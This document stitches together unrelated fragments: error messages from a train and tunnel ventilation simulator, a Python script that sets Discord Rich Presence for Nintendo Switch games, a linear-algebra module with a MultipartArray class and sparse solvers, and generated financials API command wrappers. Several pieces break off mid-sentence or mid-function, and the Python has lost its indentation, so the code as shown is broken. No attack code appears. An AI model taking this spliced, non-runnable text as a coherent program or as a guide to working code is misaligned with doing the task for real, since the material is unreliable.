SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 201 ********************************************************************************
THE DRAG COEFFICIENT WEIGHTED TOTAL TRUCK AREA IS NEGATIVE OR GREATER THAN 500 SQFT.
*ERROR* TYPE 202 ********************************************************************************
THE NUMBER OF LOOPS PASSING THROUGH BRANCHED JUNCTIONS PLUS THE NUMBER OF TRAINS THAT MAY PASS THROUGH
BRANCHED JUNCTIONS IS TOO GREAT.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 203 ********************************************************************************
AN IMPROPER SECTION HAS BEEN LINKED TO THIS BRANCHED JUNCTION.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 204 ********************************************************************************
THE NUMBER OF LINE SEGMENTS AND VENTILATION SHAFTS IN THIS ENVIRONMENTAL CONTROL ZONE
IS
#+= imports =+#
import sys
import os
import time
if sys.version_info < (3, 8):
os.system('cls' if os.name == 'nt' else 'clear')
print('[Warning] Your version of Python is lower than the recommended Python version')
print('This program officially supports Python version 3.8 and higher')
print(sys.version_info)
vInput = input('Do you wish to continue (Y/N)? ')
if vInput.lower() not in ['yes', 'y']:
sys.exit(0)
import json
import webbrowser
import ctypes
import random
try: # only try for the modules that need to be installed
import requests
from pypresence import Presence
from colorama import Fore, init
init()
os.system('cls' if os.name == 'nt' else 'clear')
except ImportError as missingmod:
os.system('cls' if os.name == 'nt' else 'clear')
print(f'[Error] Module \'{missingmod.name}\' is missing')
module = input('Would you like to install all of the required modules? ')
if module in ['yes', 'y']:
print('[Info] Installing now...')
try:
os.system('pip install --upgrade pip')
os.system('pip install pypresence')
os.system('pip install requests')
os.system('pip install colorama')
print('\n[Info] Successfully installed all of the required modules! Please restart Switchence')
time.sleep(600)
sys.exit(0)
except Exception as error:
print('Error in installing required modules automatically. Please install them manually. Error below')
print(error)
time.sleep(600)
sys.exit(0)
else:
print('[Info] Installation of required modules cancelled')
time.sleep(600)
sys.exit()
initializeTime = time.time()
#+= important functions =+#
class log:
def __init__(self, text, color):
self.text = text
self.color = color
    @staticmethod
    def error(text: str):
changeWindowTitle('Error')
clear()
print(f'{Fore.LIGHTRED_EX}[Error]{Fore.RESET} {text}')
print('Please report this error on the Switchence GitHub issue page if this error happens consistently')
time.sleep(5)
webbrowser.open('https://github.com/Aethese/Switchence/issues/', new=2, autoraise=True)
time.sleep(600)
sys.exit(1)
    @staticmethod
    def info(text: str, close):  # 'close' controls whether Switchence exits after printing the info
changeWindowTitle('Info')
print(f'{Fore.LIGHTGREEN_EX}[Info]{Fore.RESET} {text}')
if close:
clear()
print(f'{Fore.LIGHTGREEN_EX}[Info]{Fore.RESET} {text}')
print('This program will now close in 10 minutes')
time.sleep(600)
sys.exit(0)
    @staticmethod
    def loading(text: str, color):  # color is the color of the loading text
if color == 'green':
color = Fore.LIGHTGREEN_EX
elif color == 'yellow':
color = Fore.LIGHTYELLOW_EX
else:
color = Fore.LIGHTRED_EX
print(f'{Fore.LIGHTCYAN_EX}[Loading] {color}{text}{Fore.RESET}')
class config:
    @staticmethod
    def update(setting, changeto):  # rewrite a single setting in config.json
        with open('config.json', 'r') as jfile:
            jFile = json.load(jfile)
        for i in jFile['config']:
            i[setting] = changeto
with open('config.json', 'w') as jfile:
json.dump(jFile, jfile, indent=4)
@staticmethod
def create(swcode):
try: # fucking global vars
global sw, version, updatenotifier, configfname, showbutton, autoupdate, favorites
configjson = {'config': [{
'sw-code': swcode,
'version': '1.9.3',
'update-notifier': True,
'fname': False,
'show-button': True,
'auto-update': False,
'favorites': []
}]}
log.loading('Got settings to save, saving them...', 'yellow')
with open('config.json', 'w') as jsonfile:
json.dump(configjson, jsonfile, indent=4)
with open('config.json', 'r') as jsonfile: # actually get the info lol
jsonFile = json.load(jsonfile)
for details in jsonFile['config']:
sw = details['sw-code']
version = details['version']
updatenotifier = details['update-notifier']
configfname = details['fname']
showbutton = details['show-button']
autoupdate = details['auto-update']
favorites = details['favorites']
log.loading('Config file settings set!', 'green')
except Exception as error:
log.error(f'Couldn\'t create config settings | {error}')
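# For reference, config.create writes a config.json of the shape below
# (values shown are the defaults; sw-code starts empty) and config.update
# rewrites a single key in place:
#
#   {"config": [{"sw-code": "", "version": "1.9.3", "update-notifier": true,
#                "fname": false, "show-button": true, "auto-update": false,
#                "favorites": []}]}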
log.loading('Loading initial functions...', 'yellow')
def clear():
os.system('cls' if os.name == 'nt' else 'clear') # *supposedly* multiplatform supported clear
clear()
def changeWindowTitle(title):
if os.name == 'nt': # hopefully multiplatform support
ctypes.windll.kernel32.SetConsoleTitleW(f'Switchence | {title}')
changeWindowTitle('Loading...')
def reopen(path):
fileName = os.path.basename(__file__)
if not path:
return fileName # just to get path
if os.path.isfile('Switchence.exe'): # TODO: add support for if they changed file name lol
sys.exit(0) # TODO: actually reopen exe file lol
elif '.py' in fileName: # even exe files are considered .py files :/
os.system(f'python3 {fileName}')
else:
sys.exit(1)
def updateProgram(onlinever):
changeWindowTitle(f'Updating to version {onlinever}')
log.info(f'Updating to version {onlinever}...', False)
currentFile = reopen(False)
if os.path.isfile('Switchence.exe'):
config.update('auto-update', False) # fixes infinite error loop lol
log.info('The exe file does not currently support auto updating', True)
currentOnlineVersion = requests.get('https://raw.githubusercontent.com/Aethese/Switchence/main/main.py')
if currentOnlineVersion.status_code != 200: # request to get raw code was not successful
log.error(f'Status code is not 200, it is {currentOnlineVersion.status_code}, so the program will not update')
onlineVersionBinary = currentOnlineVersion.content # get binary version of raw code
with open(currentFile, 'wb') as file: # thanks to https://stackoverflow.com/users/13155625/dawid-januszkiewicz
file.write(onlineVersionBinary) # for getting this to work!
config.update('version', onlinever)
changeWindowTitle(f'Updated to version {onlinever}')
ro = input('Would you like to reopen Switchence? ')
if ro in ['yes', 'y']:
reopen(True)
log.info(f'Finished updating to version {onlinever}', True)
#+= variables =+#
# just pre defining variables
beta = False # if current build is a test build
version = None
oVersion = None # online version
sw = None
updatenotifier = None
configfname = None
showbutton = None
autoupdate = None
gamenames = []
gamefnames = []
chosenOne = ''
updateAvailable = False
announcement = None
favorites = None
tips = None
#+= loading config file =+#
log.loading('Checking for config file...', 'yellow')
if os.path.isfile('config.json'):
log.loading('Found config file, attempting to read contents...', 'yellow')
try:
with open('config.json', 'r') as jsonfile:
jsonFile = json.load(jsonfile)
for details in jsonFile['config']:
sw = details['sw-code']
version = details['version']
updatenotifier = details['update-notifier']
configfname = details['fname']
showbutton = details['show-button']
autoupdate = details['auto-update']
favorites = details['favorites']
log.loading('Loaded config settings!', 'green')
except Exception: # if some settings are missing, recreate the file while saving some settings
if sw is None: # in case an empty config file is found
sw = ''
if version is None:
version = '1.9.3'
log.loading('Missing config settings found, creating them...', 'red')
log.loading('This means some settings will be reset to default', 'red')
config.create(sw)
elif os.path.isfile('config.json') is False:
log.loading('Config file not found, attempting to create one...', 'yellow')
sw = '' # sw var is needed in function below, so it needs to be pre defined
config.create(sw)
#+= game list =+#
log.loading('Attempting to load game list...', 'yellow')
gamejson = requests.get('https://raw.githubusercontent.com/Aethese/Switchence/main/games.json') # auto update game list :)
if gamejson.status_code != 200:
log.error(f'Failed to get game list with status code {gamejson.status_code}')
gamejsontext = gamejson.text
games = json.loads(gamejsontext)
oVersion = games['version']
announcement = games['announcement']
tips = games['tips']
log.loading('Game list loaded!', 'green')
log.loading('Attempting to read game list info...', 'yellow')
for details in games['games']:
gamenames.append(details['name'])
gamefnames.append(details['fname'])
log.loading('Successfully read game list info!', 'green')
#+= checking version =+#
log.loading('Checking file version...', 'yellow')
if version in [None, '']: # checks your version
log.loading('File version not found, attempting to create...', 'red')
config.update('version', oVersion)
log.loading('Successfully created file version!', 'green')
elif version != oVersion:
updateAvailable = True
#+= rpc =+#
log.loading('Attempting to start Rich Presence...', 'yellow')
RPC = Presence('803309090696724554')
RPC.connect()
log.loading('Successfully started Rich Presence!', 'green')
#+= some more important functions =+#
def changePresence(swstatus, gameimg, gamefname):
start_time = time.time()
string = time.strftime('%H:%M', time.localtime())
if beta: # set small image to indicate build ran by user is a beta build or not
smallText = 'Switchence Beta'
smallImg = 'gold_icon'
else:
smallText = f'Switchence v{version}'
smallImg = 'switch_png'
if swstatus is False:
if showbutton:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname,
buttons=[{'label': 'Get this program here', 'url': 'https://github.com/Aethese/Switchence/releases'}], start=start_time)
else:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname, start=start_time)
print(f'Set game to {Fore.LIGHTGREEN_EX}{gamefname}{Fore.RESET} at {string}')
else:
if showbutton:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname,
state=f'SW-{sw}', buttons=[{'label': 'Get this program here', 'url': 'https://github.com/Aethese/Switchence/releases'}], start=start_time)
else:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname, state=f'SW-{sw}', start=start_time)
print(f'Set game to {Fore.LIGHTGREEN_EX}{gamefname}{Fore.RESET} at {string} with friend code \'SW-{sw}\' showing')
changeWindowTitle(f'Playing {gamefname}')
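# Presumed call shape (the call sites are elsewhere in the script):
#   changePresence(False, game_image_key, 'Some Game')
# swstatus=False hides the friend code; any other value also shows
# state='SW-<friend code>'. gameimg is passed straight to Discord as the
# large-image key.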
def changeUpdateNotifier():
picked = input('\nWhat setting do you want the Update Notifier to be set to, on or off? ')
picked = picked.lower()
if picked in ['on', 'true', 't']: # why do you want this on tbh
config.update('update-notifier', True)
log.info(f'Update notifier set to {Fore.LIGHTGREEN_EX}TRUE{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
    elif picked in ['off', 'false', 'f']:
config.update('update-notifier', False)
log.info(f'Update notifier set to {Fore.LIGHTRED_EX}FALSE{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
def changeFNameSetting():
length = 'short' if configfname is False else 'full'
print(f'\nYour current setting is set to: {Fore.LIGHTGREEN_EX}{length}{Fore.RESET}')
k = input('What do you want to change it setting to? \'Full\' for full game names or \'short\' for shortened game names ')
k = k.lower()
if k in ['full', 'f']:
config.update('fname', True)
log.info(f'Set game name to {Fore.LIGHTGREEN_EX}Full{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
elif k in ['short', 's']:
config.update('fname', False)
log.info(f'Set game name to {Fore.LIGHTGREEN_EX}Short{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
def changeAutoUpdate():
print(f'\nYour current Auto Update setting is set to {Fore.LIGHTGREEN_EX}{autoupdate}{Fore.RESET}')
ask = input('What would you like to change it to? On or off? ')
ask = ask.lower()
if ask == 'on':
config.update('auto-update', True)
log.info(f'Set Auto Update setting to {Fore.LIGHTGREEN_EX}True{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
elif ask == 'off':
config.update('auto-update', False)
log.info(f'Set Auto Update setting to {Fore.LIGHTRED_EX}False{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
else:
log.error('Keeping auto update setting the same since you did not answer correctly')
def addFavorite():
favask = input('Would you like to add or remove a favorite? ')
if favask in ['remove', 'r']:
if not favorites:
log.info('Your favorite list is currently empty', True)
rask = input('What game would you like to remove from your favorites? ')
if rask not in favorites:
log.info(f'{rask} is currently not in your favorite list', True)
favorites.remove(rask)
config.update('favorites', favorites)
log.info(f'Successfully removed {rask} from your favorite list', True)
else:
addask = input('What game would you like to add to your favorites? ')
favorites.append(addask)
config.update('favorites', favorites)
log.info(f'Successfully added {addask} to your favorite list', True)
def form():
log.info('Opening the form...', False)
webbrowser.open('https://forms.gle/ofCZ8QXQYxPvTcDE7', new=2, autoraise=True)
log.info('Form is now open! Thanks for being willing to fill out the form!', True)
def shortcut(game: int, favs) -> str:
for i in range(len(favs)):
if i + 1 == game:
return favs[i]
log.error('You don\'t have that many favorites in your favorite list. Use the \'shortcut\' command to figure out how shortcuts work')
#+= looking for game status before picking a game =+#
log.loading('Attempting to set looking for game status...', 'yellow')
startTime = time.time()
if showbutton:
RPC.update(large_image='switch_png', large_text='Searching for a game', details='Searching for a game',
buttons=[{'label': 'Get this program here', 'url': 'https://github.com/Aethese/Switchence/releases'}], start=startTime)
elif showbutton is False:
RPC.update(large_image='switch_png', large_text='Searching for a game', details='Searching for a game', start=startTime)
log.loading('Successfully set looking for game status!', 'green')
#+= home page =+#
changeWindowTitle('Picking a game')
clear()
print('''
.d8888b. d8b 888 888
d88P Y88b Y8P 888 888
Y88b. 888 888
"Y888b. 888 888 888 888 888888 .d8888b 88888b. .d88b. 88888b. .d8888b .d88b.
"Y88b. 888 888 888 888 888 d88P" 888 "88b d8P Y8b 888 "88b d88P" d8P Y8b
"888 888 | |
<filename>parsimony/utils/linalgs.py
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 23 19:15:22 2014
Copyright (c) 2013-2014, CEA/DSV/I2BM/Neurospin. All rights reserved.
@author: <NAME>, <NAME>
@email: <EMAIL>, <EMAIL>
@license: BSD 3-clause.
"""
from six import with_metaclass
import abc
import numpy as np
import scipy.sparse as sparse
try:
from . import consts
except:
from parsimony.utils import consts
__all__ = ["MultipartArray", "LinearOperatorNesterov"]
class MultipartArray(object):
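    """A 2D array stored as a list of vertically or horizontally stacked parts.

    All parts must be 2D and share the common dimension (the number of
    columns when ``vertical=True``, the number of rows otherwise).
    Element-wise arithmetic, ``dot`` and ``transpose`` operate part by part,
    so the blocks are only concatenated by an explicit ``toarray`` call.

    Examples
    --------
    >>> import numpy as np
    >>> m = MultipartArray([np.ones((2, 3)), 2 * np.ones((4, 3))],
    ...                    vertical=True)
    >>> m.shape
    (6, 3)
    >>> m.multipart_shape
    (2, 4)
    >>> v = m.dot(np.ones((3, 1)))
    >>> np.linalg.norm(v.toarray()
    ...                - np.array([[3.], [3.], [6.], [6.], [6.], [6.]])) < 5e-15
    True
    """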
def __init__(self, parts, vertical=True):
self.parts = list(parts)
self.vertical = vertical
self.common_dim = 1 if vertical else 0
self.shape = [0, 0]
self.shape[self.common_dim] = self.parts[0].shape[self.common_dim]
self.multipart_shape = []
for i in range(len(self.parts)):
if len(self.parts[i].shape) != 2:
raise ValueError("MultipartArray is only defined for 2D "
"arrays")
if not self.parts[0].shape[self.common_dim] \
== self.parts[i].shape[self.common_dim]:
raise ValueError("Input vectors must have a common dimension")
self.multipart_shape.append(
self.parts[i].shape[1 - self.common_dim])
self.shape[1 - self.common_dim] += self.multipart_shape[-1]
self.shape = tuple(self.shape)
self.multipart_shape = tuple(self.multipart_shape)
def get_parts(self):
return self.parts
def toarray(self):
if self.vertical:
return np.vstack(self.parts)
else:
return np.hstack(self.parts)
class __ops(object):
add = 0
sub = 1
mul = 2
div = 3
def __iop(self, other, op):
if np.isscalar(other):
for i in range(len(self.parts)):
if op == self.__ops.add:
self.parts[i] += other
elif op == self.__ops.sub:
self.parts[i] -= other
elif op == self.__ops.mul:
self.parts[i] *= other
elif op == self.__ops.div:
self.parts[i] *= 1.0 / other
else:
raise ValueError("Operator not yet implemented!")
elif isinstance(other, MultipartArray):
other_parts = other.get_parts()
for i in range(len(self.parts)):
if op == self.__ops.add:
self.parts[i] += other_parts[i]
elif op == self.__ops.sub:
self.parts[i] -= other_parts[i]
elif op == self.__ops.mul:
self.parts[i] *= other_parts[i]
else:
raise ValueError("Operator not yet implemented!")
elif self.shape == other.shape:
start = 0
end = 0
for i in range(len(self.parts)):
if self.vertical:
end += self.parts[i].shape[0]
if op == self.__ops.add:
self.parts[i] += other[start:end, :]
elif op == self.__ops.sub:
self.parts[i] -= other[start:end, :]
elif op == self.__ops.mul:
self.parts[i] *= other[start:end, :]
else:
raise ValueError("Operator not yet implemented!")
else:
end += self.parts[i].shape[1]
if op == self.__ops.add:
self.parts[i] += other[:, start:end]
elif op == self.__ops.sub:
self.parts[i] -= other[:, start:end]
elif op == self.__ops.mul:
self.parts[i] *= other[:, start:end]
else:
raise ValueError("Operator not yet implemented!")
start = end
else:
raise ValueError("Unknown type")
return self
def __iadd__(self, other):
return self.__iop(other, self.__ops.add)
def __isub__(self, other):
return self.__iop(other, self.__ops.sub)
def __imul__(self, other):
return self.__iop(other, self.__ops.mul)
def __idiv__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__iop(other, self.__ops.div)
def __itruediv__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__iop(float(other), self.__ops.div)
def __op(self, other, op):
new_parts = [0] * len(self.parts)
if np.isscalar(other):
for i in range(len(self.parts)):
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other
elif op == self.__ops.div:
new_parts[i] = self.parts[i] * (1.0 / other)
else:
raise ValueError("Operator not yet implemented!")
elif isinstance(other, MultipartArray):
other_parts = other.get_parts()
for i in range(len(self.parts)):
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other_parts[i]
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other_parts[i]
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other_parts[i]
else:
raise ValueError("Operator not yet implemented!")
elif self.shape == other.shape:
start = 0
end = 0
for i in range(len(self.parts)):
if self.vertical:
end += self.parts[i].shape[0]
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other[start:end, :]
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other[start:end, :]
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other[start:end, :]
else:
raise ValueError("Operator not yet implemented!")
else:
end += self.parts[i].shape[1]
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other[:, start:end]
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other[:, start:end]
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other[:, start:end]
else:
raise ValueError("Operator not yet implemented!")
start = end
else:
raise ValueError("Unknown type")
return MultipartArray(new_parts, vertical=self.vertical)
def __add__(self, other):
return self.__op(other, self.__ops.add)
def __sub__(self, other):
return self.__op(other, self.__ops.sub)
def __mul__(self, other):
return self.__op(other, self.__ops.mul)
def __div__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__op(other, self.__ops.div)
def __truediv__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__op(float(other), self.__ops.div)
def dot(self, other):
if self.vertical:
v = [0] * len(self.parts)
for i in range(len(self.parts)):
v[i] = self.parts[i].dot(other)
v = MultipartArray(v, vertical=True)
else:
v = np.zeros((self.shape[0], 1))
if isinstance(other, MultipartArray):
other_parts = other.get_parts()
for i in range(len(self.parts)):
v += self.parts[i].dot(other_parts[i])
elif self.shape[1] == other.shape[0]:
start = 0
end = 0
for i in range(len(self.parts)):
end += self.parts[i].shape[1]
v += self.parts[i].dot(other[start:end, :])
start = end
else:
raise ValueError("Type or shape unknown")
return v
def transpose(self):
new_parts = [0] * len(self.parts)
for i in range(len(self.parts)):
new_parts[i] = self.parts[i].transpose()
vertical = not self.vertical
return MultipartArray(new_parts, vertical=vertical)
def _get_T(self):
return self.transpose()
def _set_T(self, value):
raise AttributeError("attribute 'T' of 'MultipartArray' objects "
"is not writable")
def _del_T(self):
raise AttributeError("attribute 'T' of 'MultipartArray' objects "
"is not writable")
T = property(_get_T, _set_T, _del_T, 'Transpose of the array.')
def copy(self):
new_parts = [0] * len(self.parts)
for i in range(len(self.parts)):
new_parts[i] = self.parts[i].copy()
return MultipartArray(new_parts, vertical=self.vertical)
def __str__(self):
string = "["
if self.vertical:
for k in range(len(self.parts)):
for i in range(self.parts[k].shape[0]):
if i > 0 or k > 0:
string += ' '
string += str(self.parts[k][i, :])
if k < len(self.parts) - 1 \
or i < self.parts[k].shape[0] - 1:
string += '\n'
if k < len(self.parts) - 1:
string += ' '
string += '-' * (len(str(self.parts[k][i, :])) - 3)
string += "\n"
else:
for i in range(self.parts[0].shape[0]):
for k in range(len(self.parts)):
if k == 0 and i > 0:
string += ' '
string += str(self.parts[k][i, :])
if i < self.parts[len(self.parts) - 1].shape[0] - 1:
string += '\n'
string += "]"
return string
def __repr__(self):
string = "MultipartArray(\n" + str(self.parts)
if self.vertical:
string += ")"
else:
string += ",\nvertical=" + str(self.vertical) + ")"
return string
class Solver(with_metaclass(abc.ABCMeta, object)):
    def solve(self, A, b, eps=consts.TOLERANCE, max_iter=consts.MAX_ITER):
        """Solves a linear system of the form
A.x = b,
for x.
Parameters
----------
A : A matrix with shape n-by-p. The coefficient matrix.
b : Numpy array, n-by-1. The right-hand-side vector.
"""
raise NotImplementedError('Abstract method "solve" must be '
'specialised!')
class SparseSolver(Solver):
def solve(self, A, b, **kwargs):
"""Solves linear systems on the form
A.x = d,
for x.
Parameters
----------
A : A sparse matrix with shape n-by-p. The coefficient matrix.
b : Numpy array, n-by-1. The right-hand-side vector.
Examples
--------
>>> import numpy as np
>>> import scipy.sparse as sparse
>>> import parsimony.utils.linalgs as linalgs
>>> np.random.seed(42)
>>>
>>> n = 10
>>> a = np.random.rand(n); a[-1] = 0.0
>>> b = np.random.rand(n)
>>> c = np.random.rand(n); c[0] = 0.0
>>> A_ = np.random.rand(n, n)
>>> A_[A_ < 0.5] = 0.0
>>> A = sparse.csr_matrix(A_)
>>> d = np.random.rand(n, 1)
>>>
>>> solver = linalgs.SparseSolver()
>>> x = solver.solve(A, d)
>>> x_ = np.linalg.solve(A.toarray(), d)
>>> np.linalg.norm(x - x_) < 5e-15
True
>>>
>>> import time
>>> n = 100
>>> a = np.random.rand(n); a[-1] = 0.0
>>> b = np.random.rand(n)
>>> c = np.random.rand(n); c[0] = 0.0
>>> A_ = np.random.rand(n, n)
>>> A_[A_ < 0.5] = 0.0
>>> A = sparse.csr_matrix(A_)
>>> d = np.random.rand(n, 1)
>>>
>>> t = time.time()
>>> x = solver.solve(A, d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>>
>>> t = time.time()
>>> x_ = np.linalg.solve(A.toarray(), d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>> np.linalg.norm(x - x_) < 5e-13
True
>>>
>>> n = 1000
>>> a = np.random.rand(n); a[-1] = 0.0
>>> b = np.random.rand(n)
>>> c = np.random.rand(n); c[0] = 0.0
>>> A_ = np.random.rand(n, n)
>>> A_[A_ < 0.5] = 0.0
>>> A = sparse.csr_matrix(A_)
>>> d = np.random.rand(n, 1)
>>>
>>> t = time.time()
>>> x = solver.solve(A, d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>>
>>> t = time.time()
>>> x_ = np.linalg.solve(A.toarray(), d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>>
>>> np.linalg.norm(x - x_) < 5e-11
True
"""
n, p = A.shape
x = sparse.linalg.spsolve(A, b)
return x.reshape((n, 1))
class TridiagonalSolver(Solver):
def solve(self, A, d, **kwargs):
"""Solves linear systems with a tridiagonal coefficient | |
def financials_financial_company_item_update_item_category(client,
company_id,
item_id,
id_=None,
code=None,
display_name=None,
last_modified_date_time=None):
body = {}
body['id'] = id_
body['code'] = code
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
return client.update_item_category(company_id=company_id,
item_id=item_id,
body=body)
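# Note: every command helper in this module follows the same pattern -- the
# optional keyword arguments are collected into a `body` dict (None values
# are passed through rather than stripped) and forwarded to the matching
# method on the generated `client`.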
def financials_financial_company_item_update_picture(client,
company_id,
item_id,
picture_id,
content_type,
id_=None,
content=None,
height=None,
width=None):
body = {}
body['id'] = id_
body['content'] = content
body['content_type'] = content_type
body['height'] = height
body['width'] = width
return client.update_picture(company_id=company_id,
item_id=item_id,
picture_id=picture_id,
body=body)
def financials_financial_company_journal_line_delete_account(client,
company_id,
journal_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
journal_line_id=journal_line_id,
if_match=if_match)
def financials_financial_company_journal_line_show_account(client,
company_id,
journal_line_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
journal_line_id=journal_line_id,
select=select,
expand=expand)
def financials_financial_company_journal_line_update_account(client,
company_id,
journal_line_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
journal_line_id=journal_line_id,
body=body)
def financials_financial_company_journal_create_journal_line(client,
company_id,
journal_id,
id_=None,
account_id=None,
account_number=None,
amount=None,
comment=None,
description=None,
document_number=None,
external_document_number=None,
journal_display_name=None,
last_modified_date_time=None,
line_number=None,
posting_date=None,
account=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['account_number'] = account_number
body['amount'] = amount
body['comment'] = comment
body['description'] = description
body['document_number'] = document_number
body['external_document_number'] = external_document_number
body['journal_display_name'] = journal_display_name
body['last_modified_date_time'] = last_modified_date_time
body['line_number'] = line_number
body['posting_date'] = posting_date
body['account'] = account
return client.create_journal_lines(company_id=company_id,
journal_id=journal_id,
body=body)
def financials_financial_company_journal_delete_account(client,
company_id,
journal_id,
if_match=None):
return client.delete_account(company_id=company_id,
journal_id=journal_id,
if_match=if_match)
def financials_financial_company_journal_delete_journal_line(client,
company_id,
journal_id,
journal_line_id,
if_match=None):
return client.delete_journal_lines(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
if_match=if_match)
def financials_financial_company_journal_list_journal_line(client,
company_id,
journal_id,
orderby=None,
select=None,
expand=None):
return client.list_journal_lines(company_id=company_id,
journal_id=journal_id,
orderby=orderby,
select=select,
expand=expand)
def financials_financial_company_journal_post(client,
company_id,
journal_id):
return client.post(company_id=company_id,
journal_id=journal_id)
def financials_financial_company_journal_show_account(client,
company_id,
journal_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
journal_id=journal_id,
select=select,
expand=expand)
def financials_financial_company_journal_show_journal_line(client,
company_id,
journal_id,
journal_line_id,
select=None,
expand=None):
return client.get_journal_lines(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
select=select,
expand=expand)
def financials_financial_company_journal_update_account(client,
company_id,
journal_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
journal_id=journal_id,
body=body)
def financials_financial_company_journal_update_journal_line(client,
company_id,
journal_id,
journal_line_id,
id_=None,
account_id=None,
account_number=None,
amount=None,
comment=None,
description=None,
document_number=None,
external_document_number=None,
journal_display_name=None,
last_modified_date_time=None,
line_number=None,
posting_date=None,
account=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['account_number'] = account_number
body['amount'] = amount
body['comment'] = comment
body['description'] = description
body['document_number'] = document_number
body['external_document_number'] = external_document_number
body['journal_display_name'] = journal_display_name
body['last_modified_date_time'] = last_modified_date_time
body['line_number'] = line_number
body['posting_date'] = posting_date
body['account'] = account
return client.update_journal_lines(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
body=body)
def financials_financial_company_journal_journal_line_delete_account(client,
company_id,
journal_id,
journal_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
if_match=if_match)
def financials_financial_company_journal_journal_line_show_account(client,
company_id,
journal_id,
journal_line_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
select=select,
expand=expand)
def financials_financial_company_journal_journal_line_update_account(client,
company_id,
journal_id,
journal_line_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_delete_account(client,
company_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
